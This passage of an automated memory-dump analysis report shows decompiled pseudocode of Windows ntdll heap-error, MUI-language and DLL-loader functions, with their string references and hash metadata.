                                                                                  				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                  					_push(_t104);
                                                                                  					E00EAB150();
                                                                                  				} else {
                                                                                  					E00EAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                  				}
                                                                                  				return E00EAB150("Stack trace available at %p\n", 0xf958c0);
                                                                                  			}












                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                  • API String ID: 0-2897834094
                                                                                  • Opcode ID: b2c7b8fb5b4a50d12118a4c440c47ee3b34b7a73386e36a6d76d477af140da03
                                                                                  • Instruction ID: b8c741a9d8d7dbab1f0d47ae25301f7ac1690684b7fcb5213a6eb695cb6b5da3
                                                                                  • Opcode Fuzzy Hash: b2c7b8fb5b4a50d12118a4c440c47ee3b34b7a73386e36a6d76d477af140da03
                                                                                  • Instruction Fuzzy Hash: A1619033A52648DFC711EB84D896A2573E4FB18B31B1D917AF90D7F352D624AC40EB0A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 96%
                                                                                  			E00EB3D34(signed int* __ecx) {
                                                                                  				signed int* _v8;
                                                                                  				char _v12;
                                                                                  				signed int* _v16;
                                                                                  				signed int* _v20;
                                                                                  				char _v24;
                                                                                  				signed int _v28;
                                                                                  				signed int _v32;
                                                                                  				char _v36;
                                                                                  				signed int _v40;
                                                                                  				signed int _v44;
                                                                                  				signed int* _v48;
                                                                                  				signed int* _v52;
                                                                                  				signed int _v56;
                                                                                  				signed int _v60;
                                                                                  				char _v68;
                                                                                  				signed int _t140;
                                                                                  				signed int _t161;
                                                                                  				signed int* _t236;
                                                                                  				signed int* _t242;
                                                                                  				signed int* _t243;
                                                                                  				signed int* _t244;
                                                                                  				signed int* _t245;
                                                                                  				signed int _t255;
                                                                                  				void* _t257;
                                                                                  				signed int _t260;
                                                                                  				void* _t262;
                                                                                  				signed int _t264;
                                                                                  				void* _t267;
                                                                                  				signed int _t275;
                                                                                  				signed int* _t276;
                                                                                  				short* _t277;
                                                                                  				signed int* _t278;
                                                                                  				signed int* _t279;
                                                                                  				signed int* _t280;
                                                                                  				short* _t281;
                                                                                  				signed int* _t282;
                                                                                  				short* _t283;
                                                                                  				signed int* _t284;
                                                                                  				void* _t285;
                                                                                  
                                                                                  				_v60 = _v60 | 0xffffffff;
                                                                                  				_t280 = 0;
                                                                                  				_t242 = __ecx;
                                                                                  				_v52 = __ecx;
                                                                                  				_v8 = 0;
                                                                                  				_v20 = 0;
                                                                                  				_v40 = 0;
                                                                                  				_v28 = 0;
                                                                                  				_v32 = 0;
                                                                                  				_v44 = 0;
                                                                                  				_v56 = 0;
                                                                                  				_t275 = 0;
                                                                                  				_v16 = 0;
                                                                                  				if(__ecx == 0) {
                                                                                  					_t280 = 0xc000000d;
                                                                                  					_t140 = 0;
                                                                                  					L50:
                                                                                  					 *_t242 =  *_t242 | 0x00000800;
                                                                                  					_t242[0x13] = _t140;
                                                                                  					_t242[0x16] = _v40;
                                                                                  					_t242[0x18] = _v28;
                                                                                  					_t242[0x14] = _v32;
                                                                                  					_t242[0x17] = _t275;
                                                                                  					_t242[0x15] = _v44;
                                                                                  					_t242[0x11] = _v56;
                                                                                  					_t242[0x12] = _v60;
                                                                                  					return _t280;
                                                                                  				}
                                                                                  				if(E00EB1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                  					_v56 = 1;
                                                                                  					if(_v8 != 0) {
                                                                                  						L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                                  					}
                                                                                  					_v8 = _t280;
                                                                                  				}
                                                                                  				if(E00EB1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                  					_v60 =  *_v8;
                                                                                  					L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                                  					_v8 = _t280;
                                                                                  				}
                                                                                  				if(E00EB1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                  					L16:
                                                                                  					if(E00EB1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                  						L28:
                                                                                  						if(E00EB1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                  							L46:
                                                                                  							_t275 = _v16;
                                                                                  							L47:
                                                                                  							_t161 = 0;
                                                                                  							L48:
                                                                                  							if(_v8 != 0) {
                                                                                  								L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                                  							}
                                                                                  							_t140 = _v20;
                                                                                  							if(_t140 != 0) {
                                                                                  								if(_t275 != 0) {
                                                                                  									L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                                  									_t275 = 0;
                                                                                  									_v28 = 0;
                                                                                  									_t140 = _v20;
                                                                                  								}
                                                                                  							}
                                                                                  							goto L50;
                                                                                  						}
                                                                                  						_t167 = _v12;
                                                                                  						_t255 = _v12 + 4;
                                                                                  						_v44 = _t255;
                                                                                  						if(_t255 == 0) {
                                                                                  							_t276 = _t280;
                                                                                  							_v32 = _t280;
                                                                                  						} else {
                                                                                  							_t276 = L00EC4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                                  							_t167 = _v12;
                                                                                  							_v32 = _t276;
                                                                                  						}
                                                                                  						if(_t276 == 0) {
                                                                                  							_v44 = _t280;
                                                                                  							_t280 = 0xc0000017;
                                                                                  							goto L46;
                                                                                  						} else {
                                                                                  							E00EEF3E0(_t276, _v8, _t167);
                                                                                  							_v48 = _t276;
                                                                                  							_t277 = E00EF1370(_t276, 0xe84e90);
                                                                                  							_pop(_t257);
                                                                                  							if(_t277 == 0) {
                                                                                  								L38:
                                                                                  								_t170 = _v48;
                                                                                  								if( *_v48 != 0) {
                                                                                  									E00EEBB40(0,  &_v68, _t170);
                                                                                  									if(L00EB43C0( &_v68,  &_v24) != 0) {
                                                                                  										_t280 =  &(_t280[0]);
                                                                                  									}
                                                                                  								}
                                                                                  								if(_t280 == 0) {
                                                                                  									_t280 = 0;
                                                                                  									L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                                  									_v44 = 0;
                                                                                  									_v32 = 0;
                                                                                  								} else {
                                                                                  									_t280 = 0;
                                                                                  								}
                                                                                  								_t174 = _v8;
                                                                                  								if(_v8 != 0) {
                                                                                  									L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                                  								}
                                                                                  								_v8 = _t280;
                                                                                  								goto L46;
                                                                                  							}
                                                                                  							_t243 = _v48;
                                                                                  							do {
                                                                                  								 *_t277 = 0;
                                                                                  								_t278 = _t277 + 2;
                                                                                  								E00EEBB40(_t257,  &_v68, _t243);
                                                                                  								if(L00EB43C0( &_v68,  &_v24) != 0) {
                                                                                  									_t280 =  &(_t280[0]);
                                                                                  								}
                                                                                  								_t243 = _t278;
                                                                                  								_t277 = E00EF1370(_t278, 0xe84e90);
                                                                                  								_pop(_t257);
                                                                                  							} while (_t277 != 0);
                                                                                  							_v48 = _t243;
                                                                                  							_t242 = _v52;
                                                                                  							goto L38;
                                                                                  						}
                                                                                  					}
                                                                                  					_t191 = _v12;
                                                                                  					_t260 = _v12 + 4;
                                                                                  					_v28 = _t260;
                                                                                  					if(_t260 == 0) {
                                                                                  						_t275 = _t280;
                                                                                  						_v16 = _t280;
                                                                                  					} else {
                                                                                  						_t275 = L00EC4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                                  						_t191 = _v12;
                                                                                  						_v16 = _t275;
                                                                                  					}
                                                                                  					if(_t275 == 0) {
                                                                                  						_v28 = _t280;
                                                                                  						_t280 = 0xc0000017;
                                                                                  						goto L47;
                                                                                  					} else {
                                                                                  						E00EEF3E0(_t275, _v8, _t191);
                                                                                  						_t285 = _t285 + 0xc;
                                                                                  						_v48 = _t275;
                                                                                  						_t279 = _t280;
                                                                                  						_t281 = E00EF1370(_v16, 0xe84e90);
                                                                                  						_pop(_t262);
                                                                                  						if(_t281 != 0) {
                                                                                  							_t244 = _v48;
                                                                                  							do {
                                                                                  								 *_t281 = 0;
                                                                                  								_t282 = _t281 + 2;
                                                                                  								E00EEBB40(_t262,  &_v68, _t244);
                                                                                  								if(L00EB43C0( &_v68,  &_v24) != 0) {
                                                                                  									_t279 =  &(_t279[0]);
                                                                                  								}
                                                                                  								_t244 = _t282;
                                                                                  								_t281 = E00EF1370(_t282, 0xe84e90);
                                                                                  								_pop(_t262);
                                                                                  							} while (_t281 != 0);
                                                                                  							_v48 = _t244;
                                                                                  							_t242 = _v52;
                                                                                  						}
                                                                                  						_t201 = _v48;
                                                                                  						_t280 = 0;
                                                                                  						if( *_v48 != 0) {
                                                                                  							E00EEBB40(_t262,  &_v68, _t201);
                                                                                  							if(L00EB43C0( &_v68,  &_v24) != 0) {
                                                                                  								_t279 =  &(_t279[0]);
                                                                                  							}
                                                                                  						}
                                                                                  						if(_t279 == 0) {
                                                                                  							L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                                  							_v28 = _t280;
                                                                                  							_v16 = _t280;
                                                                                  						}
                                                                                  						_t202 = _v8;
                                                                                  						if(_v8 != 0) {
                                                                                  							L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                                  						}
                                                                                  						_v8 = _t280;
                                                                                  						goto L28;
                                                                                  					}
                                                                                  				}
                                                                                  				_t214 = _v12;
                                                                                  				_t264 = _v12 + 4;
                                                                                  				_v40 = _t264;
                                                                                  				if(_t264 == 0) {
                                                                                  					_v20 = _t280;
                                                                                  				} else {
                                                                                  					_t236 = L00EC4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                                  					_t280 = _t236;
                                                                                  					_v20 = _t236;
                                                                                  					_t214 = _v12;
                                                                                  				}
                                                                                  				if(_t280 == 0) {
                                                                                  					_t161 = 0;
                                                                                  					_t280 = 0xc0000017;
                                                                                  					_v40 = 0;
                                                                                  					goto L48;
                                                                                  				} else {
                                                                                  					E00EEF3E0(_t280, _v8, _t214);
                                                                                  					_t285 = _t285 + 0xc;
                                                                                  					_v48 = _t280;
                                                                                  					_t283 = E00EF1370(_t280, 0xe84e90);
                                                                                  					_pop(_t267);
                                                                                  					if(_t283 != 0) {
                                                                                  						_t245 = _v48;
                                                                                  						do {
                                                                                  							 *_t283 = 0;
                                                                                  							_t284 = _t283 + 2;
                                                                                  							E00EEBB40(_t267,  &_v68, _t245);
                                                                                  							if(L00EB43C0( &_v68,  &_v24) != 0) {
                                                                                  								_t275 = _t275 + 1;
                                                                                  							}
                                                                                  							_t245 = _t284;
                                                                                  							_t283 = E00EF1370(_t284, 0xe84e90);
                                                                                  							_pop(_t267);
                                                                                  						} while (_t283 != 0);
                                                                                  						_v48 = _t245;
                                                                                  						_t242 = _v52;
                                                                                  					}
                                                                                  					_t224 = _v48;
                                                                                  					_t280 = 0;
                                                                                  					if( *_v48 != 0) {
                                                                                  						E00EEBB40(_t267,  &_v68, _t224);
                                                                                  						if(L00EB43C0( &_v68,  &_v24) != 0) {
                                                                                  							_t275 = _t275 + 1;
                                                                                  						}
                                                                                  					}
                                                                                  					if(_t275 == 0) {
                                                                                  						L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                                  						_v40 = _t280;
                                                                                  						_v20 = _t280;
                                                                                  					}
                                                                                  					_t225 = _v8;
                                                                                  					if(_v8 != 0) {
                                                                                  						L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                                  					}
                                                                                  					_v8 = _t280;
                                                                                  					goto L16;
                                                                                  				}
                                                                                  			}










































                                                                                  0x00eb3ee8
                                                                                  0x00eb3eed
                                                                                  0x00eb3ef0
                                                                                  0x00eb3ef3
                                                                                  0x00eb3f02
                                                                                  0x00eb3f05
                                                                                  0x00eb3f08
                                                                                  0x00f082c0
                                                                                  0x00f082c3
                                                                                  0x00f082c5
                                                                                  0x00f082c8
                                                                                  0x00f082d0
                                                                                  0x00f082e4
                                                                                  0x00f082e6
                                                                                  0x00f082e6
                                                                                  0x00f082ed
                                                                                  0x00f082f4
                                                                                  0x00f082f7
                                                                                  0x00f082f8
                                                                                  0x00f082fc
                                                                                  0x00f082ff
                                                                                  0x00f082ff
                                                                                  0x00eb3f0e
                                                                                  0x00eb3f11
                                                                                  0x00eb3f16
                                                                                  0x00eb3f1d
                                                                                  0x00eb3f31
                                                                                  0x00f08307
                                                                                  0x00f08307
                                                                                  0x00eb3f31
                                                                                  0x00eb3f39
                                                                                  0x00eb3f48
                                                                                  0x00eb3f4d
                                                                                  0x00eb3f50
                                                                                  0x00eb3f50
                                                                                  0x00eb3f53
                                                                                  0x00eb3f58
                                                                                  0x00eb3f65
                                                                                  0x00eb3f65
                                                                                  0x00eb3f6a
                                                                                  0x00000000
                                                                                  0x00eb3f6a
                                                                                  0x00eb3edd
                                                                                  0x00eb3dda
                                                                                  0x00eb3ddd
                                                                                  0x00eb3de0
                                                                                  0x00eb3de5
                                                                                  0x00f08245
                                                                                  0x00eb3deb
                                                                                  0x00eb3df7
                                                                                  0x00eb3dfc
                                                                                  0x00eb3dfe
                                                                                  0x00eb3e01
                                                                                  0x00eb3e01
                                                                                  0x00eb3e06
                                                                                  0x00f0824d
                                                                                  0x00f0824f
                                                                                  0x00f08254
                                                                                  0x00000000
                                                                                  0x00eb3e0c
                                                                                  0x00eb3e11
                                                                                  0x00eb3e16
                                                                                  0x00eb3e19
                                                                                  0x00eb3e29
                                                                                  0x00eb3e2c
                                                                                  0x00eb3e2f
                                                                                  0x00f0825c
                                                                                  0x00f0825f
                                                                                  0x00f08261
                                                                                  0x00f08264
                                                                                  0x00f0826c
                                                                                  0x00f08280
                                                                                  0x00f08282
                                                                                  0x00f08282
                                                                                  0x00f08289
                                                                                  0x00f08290
                                                                                  0x00f08293
                                                                                  0x00f08294
                                                                                  0x00f08298
                                                                                  0x00f0829b
                                                                                  0x00f0829b
                                                                                  0x00eb3e35
                                                                                  0x00eb3e38
                                                                                  0x00eb3e3d
                                                                                  0x00eb3e44
                                                                                  0x00eb3e58
                                                                                  0x00f082a3
                                                                                  0x00f082a3
                                                                                  0x00eb3e58
                                                                                  0x00eb3e60
                                                                                  0x00eb3e6f
                                                                                  0x00eb3e74
                                                                                  0x00eb3e77
                                                                                  0x00eb3e77
                                                                                  0x00eb3e7a
                                                                                  0x00eb3e7f
                                                                                  0x00eb3e8c
                                                                                  0x00eb3e8c
                                                                                  0x00eb3e91
                                                                                  0x00000000
                                                                                  0x00eb3e91

                                                                                  Strings
                                                                                  • Kernel-MUI-Number-Allowed, xrefs: 00EB3D8C
                                                                                  • Kernel-MUI-Language-SKU, xrefs: 00EB3F70
                                                                                  • WindowsExcludedProcs, xrefs: 00EB3D6F
                                                                                  • Kernel-MUI-Language-Allowed, xrefs: 00EB3DC0
                                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 00EB3E97
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                  • API String ID: 0-258546922
                                                                                  • Opcode ID: 64087f7262ad8b93343fd69a3a7567d6fef1e37e3f730b640259932694739592
                                                                                  • Instruction ID: 46f4bb35bf05bb4a64503d34953bac120537d1822d88b42eb70dac8f0d5e965e
                                                                                  • Opcode Fuzzy Hash: 64087f7262ad8b93343fd69a3a7567d6fef1e37e3f730b640259932694739592
                                                                                  • Instruction Fuzzy Hash: 3EF118B2D00619EBCB11DFA8C981AEFBBF9EF48750F15106AE505B7251E7319E01DBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 44%
                                                                                  			E00ED8E00(void* __ecx) {
                                                                                  				signed int _v8;
                                                                                  				char _v12;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				intOrPtr* _t32;
                                                                                  				intOrPtr _t35;
                                                                                  				intOrPtr _t43;
                                                                                  				void* _t46;
                                                                                  				intOrPtr _t47;
                                                                                  				void* _t48;
                                                                                  				signed int _t49;
                                                                                  				void* _t50;
                                                                                  				intOrPtr* _t51;
                                                                                  				signed int _t52;
                                                                                  				void* _t53;
                                                                                  				intOrPtr _t55;
                                                                                  
                                                                                  				_v8 =  *0xf9d360 ^ _t52;
                                                                                  				_t49 = 0;
                                                                                  				_t48 = __ecx;
                                                                                  				_t55 =  *0xf98464; // 0x75150110
                                                                                  				if(_t55 == 0) {
                                                                                  					L9:
                                                                                  					if( !_t49 >= 0) {
                                                                                  						if(( *0xf95780 & 0x00000003) != 0) {
                                                                                  							E00F25510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                                  						}
                                                                                  						if(( *0xf95780 & 0x00000010) != 0) {
                                                                                  							asm("int3");
                                                                                  						}
                                                                                  					}
                                                                                  					return E00EEB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                                  				}
                                                                                  				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                                  				_t43 =  *0xf97984; // 0xbe2b78
                                                                                  				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                                  					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                                  					if(_t48 == _t43) {
                                                                                  						_t50 = 0x5c;
                                                                                  						if( *_t32 == _t50) {
                                                                                  							_t46 = 0x3f;
                                                                                  							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                                  								_t32 = _t32 + 8;
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					_t51 =  *0xf98464; // 0x75150110
                                                                                  					 *0xf9b1e0(_t47, _t32,  &_v12);
                                                                                  					_t49 =  *_t51();
                                                                                  					if(_t49 >= 0) {
                                                                                  						L8:
                                                                                  						_t35 = _v12;
                                                                                  						if(_t35 != 0) {
                                                                                  							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                                  								E00ED9B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                                  								_t35 = _v12;
                                                                                  							}
                                                                                  							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                                  						}
                                                                                  						goto L9;
                                                                                  					}
                                                                                  					if(_t49 != 0xc000008a) {
                                                                                  						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                                  							if(_t49 != 0xc00000bb) {
                                                                                  								goto L8;
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					if(( *0xf95780 & 0x00000005) != 0) {
                                                                                  						_push(_t49);
                                                                                  						E00F25510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                                  						_t53 = _t53 + 0x1c;
                                                                                  					}
                                                                                  					_t49 = 0;
                                                                                  					goto L8;
                                                                                  				} else {
                                                                                  					goto L9;
                                                                                  				}
                                                                                  			}





















                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 00F1933B, 00F19367
                                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 00F19357
                                                                                  • LdrpFindDllActivationContext, xrefs: 00F19331, 00F1935D
                                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00F1932A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                  • API String ID: 0-3779518884
                                                                                  • Opcode ID: b4717b8aace0267c16a3c3e90742c981e693de66039ee2f99ce0937f17fd13f2
                                                                                  • Instruction ID: c7d8c390697c3bd47dff6922f8e52cdbe0fada7da8b177ef2159541345ef4deb
                                                                                  • Opcode Fuzzy Hash: b4717b8aace0267c16a3c3e90742c981e693de66039ee2f99ce0937f17fd13f2
                                                                                  • Instruction Fuzzy Hash: F3412B32A003159EDB35AB188E49A79B3B4FB1075CF05652BEC4877391EF70AD819BC1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 83%
                                                                                  			E00EB8794(void* __ecx) {
                                                                                  				signed int _v0;
                                                                                  				char _v8;
                                                                                  				signed int _v12;
                                                                                  				void* _v16;
                                                                                  				signed int _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				signed int _v28;
                                                                                  				signed int _v32;
                                                                                  				signed int _v40;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				void* __ebp;
                                                                                  				intOrPtr* _t77;
                                                                                  				signed int _t80;
                                                                                  				signed char _t81;
                                                                                  				signed int _t87;
                                                                                  				signed int _t91;
                                                                                  				void* _t92;
                                                                                  				void* _t94;
                                                                                  				signed int _t95;
                                                                                  				signed int _t103;
                                                                                  				signed int _t105;
                                                                                  				signed int _t110;
                                                                                  				signed int _t118;
                                                                                  				intOrPtr* _t121;
                                                                                  				intOrPtr _t122;
                                                                                  				signed int _t125;
                                                                                  				signed int _t129;
                                                                                  				signed int _t131;
                                                                                  				signed int _t134;
                                                                                  				signed int _t136;
                                                                                  				signed int _t143;
                                                                                  				signed int* _t147;
                                                                                  				signed int _t151;
                                                                                  				void* _t153;
                                                                                  				signed int* _t157;
                                                                                  				signed int _t159;
                                                                                  				signed int _t161;
                                                                                  				signed int _t166;
                                                                                  				signed int _t168;
                                                                                  
                                                                                  				_push(__ecx);
                                                                                  				_t153 = __ecx;
                                                                                  				_t159 = 0;
                                                                                  				_t121 = __ecx + 0x3c;
                                                                                  				if( *_t121 == 0) {
                                                                                  					L2:
                                                                                  					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                                  					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                                  						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                                  						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                                  						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                                  							L6:
                                                                                  							if(E00EB934A() != 0) {
                                                                                  								_t159 = E00F2A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                                  								__eflags = _t159;
                                                                                  								if(_t159 < 0) {
                                                                                  									_t81 =  *0xf95780; // 0x0
                                                                                  									__eflags = _t81 & 0x00000003;
                                                                                  									if((_t81 & 0x00000003) != 0) {
                                                                                  										_push(_t159);
                                                                                  										E00F25510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                                  										_t81 =  *0xf95780; // 0x0
                                                                                  									}
                                                                                  									__eflags = _t81 & 0x00000010;
                                                                                  									if((_t81 & 0x00000010) != 0) {
                                                                                  										asm("int3");
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						} else {
                                                                                  							_t159 = E00EB849B(0, _t122, _t153, _t159, _t180);
                                                                                  							if(_t159 >= 0) {
                                                                                  								goto L6;
                                                                                  							}
                                                                                  						}
                                                                                  						_t80 = _t159;
                                                                                  						goto L8;
                                                                                  					} else {
                                                                                  						_t125 = 0x13;
                                                                                  						asm("int 0x29");
                                                                                  						_push(0);
                                                                                  						_push(_t159);
                                                                                  						_t161 = _t125;
                                                                                  						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                                  						_t143 = 0;
                                                                                  						_v40 = _t161;
                                                                                  						_t118 = 0;
                                                                                  						_push(_t153);
                                                                                  						__eflags = _t87;
                                                                                  						if(_t87 != 0) {
                                                                                  							_t118 = _t87 + 0x5d8;
                                                                                  							__eflags = _t118;
                                                                                  							if(_t118 == 0) {
                                                                                  								L46:
                                                                                  								_t118 = 0;
                                                                                  							} else {
                                                                                  								__eflags =  *(_t118 + 0x30);
                                                                                  								if( *(_t118 + 0x30) == 0) {
                                                                                  									goto L46;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						_v32 = 0;
                                                                                  						_v28 = 0;
                                                                                  						_v16 = 0;
                                                                                  						_v20 = 0;
                                                                                  						_v12 = 0;
                                                                                  						__eflags = _t118;
                                                                                  						if(_t118 != 0) {
                                                                                  							__eflags = _t161;
                                                                                  							if(_t161 != 0) {
                                                                                  								__eflags =  *(_t118 + 8);
                                                                                  								if( *(_t118 + 8) == 0) {
                                                                                  									L22:
                                                                                  									_t143 = 1;
                                                                                  									__eflags = 1;
                                                                                  								} else {
                                                                                  									_t19 = _t118 + 0x40; // 0x40
                                                                                  									_t156 = _t19;
                                                                                  									E00EB8999(_t19,  &_v16);
                                                                                  									__eflags = _v0;
                                                                                  									if(_v0 != 0) {
                                                                                  										__eflags = _v0 - 1;
                                                                                  										if(_v0 != 1) {
                                                                                  											goto L22;
                                                                                  										} else {
                                                                                  											_t128 =  *(_t161 + 0x64);
                                                                                  											__eflags =  *(_t161 + 0x64);
                                                                                  											if( *(_t161 + 0x64) == 0) {
                                                                                  												goto L22;
                                                                                  											} else {
                                                                                  												E00EB8999(_t128,  &_v12);
                                                                                  												_t147 = _v12;
                                                                                  												_t91 = 0;
                                                                                  												__eflags = 0;
                                                                                  												_t129 =  *_t147;
                                                                                  												while(1) {
                                                                                  													__eflags =  *((intOrPtr*)(0xf95c60 + _t91 * 8)) - _t129;
                                                                                  													if( *((intOrPtr*)(0xf95c60 + _t91 * 8)) == _t129) {
                                                                                  														break;
                                                                                  													}
                                                                                  													_t91 = _t91 + 1;
                                                                                  													__eflags = _t91 - 5;
                                                                                  													if(_t91 < 5) {
                                                                                  														continue;
                                                                                  													} else {
                                                                                  														_t131 = 0;
                                                                                  														__eflags = 0;
                                                                                  													}
                                                                                  													L37:
                                                                                  													__eflags = _t131;
                                                                                  													if(_t131 != 0) {
                                                                                  														goto L22;
                                                                                  													} else {
                                                                                  														__eflags = _v16 - _t147;
                                                                                  														if(_v16 != _t147) {
                                                                                  															goto L22;
                                                                                  														} else {
                                                                                  															E00EC2280(_t92, 0xf986cc);
                                                                                  															_t94 = E00F79DFB( &_v20);
                                                                                  															__eflags = _t94 - 1;
                                                                                  															if(_t94 != 1) {
                                                                                  															}
                                                                                  															asm("movsd");
                                                                                  															asm("movsd");
                                                                                  															asm("movsd");
                                                                                  															asm("movsd");
                                                                                  															 *_t118 =  *_t118 + 1;
                                                                                  															asm("adc dword [ebx+0x4], 0x0");
                                                                                  															_t95 = E00ED61A0( &_v32);
                                                                                  															__eflags = _t95;
                                                                                  															if(_t95 != 0) {
                                                                                  																__eflags = _v32 | _v28;
                                                                                  																if((_v32 | _v28) != 0) {
                                                                                  																	_t71 = _t118 + 0x40; // 0x3f
                                                                                  																	_t134 = _t71;
                                                                                  																	goto L55;
                                                                                  																}
                                                                                  															}
                                                                                  															goto L30;
                                                                                  														}
                                                                                  													}
                                                                                  													goto L56;
                                                                                  												}
                                                                                  												_t92 = 0xf95c64 + _t91 * 8;
                                                                                  												asm("lock xadd [eax], ecx");
                                                                                  												_t131 = (_t129 | 0xffffffff) - 1;
                                                                                  												goto L37;
                                                                                  											}
                                                                                  										}
                                                                                  										goto L56;
                                                                                  									} else {
                                                                                  										_t143 = E00EB8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                                  										__eflags = _t143;
                                                                                  										if(_t143 != 0) {
                                                                                  											_t157 = _v12;
                                                                                  											_t103 = 0;
                                                                                  											__eflags = 0;
                                                                                  											_t136 =  &(_t157[1]);
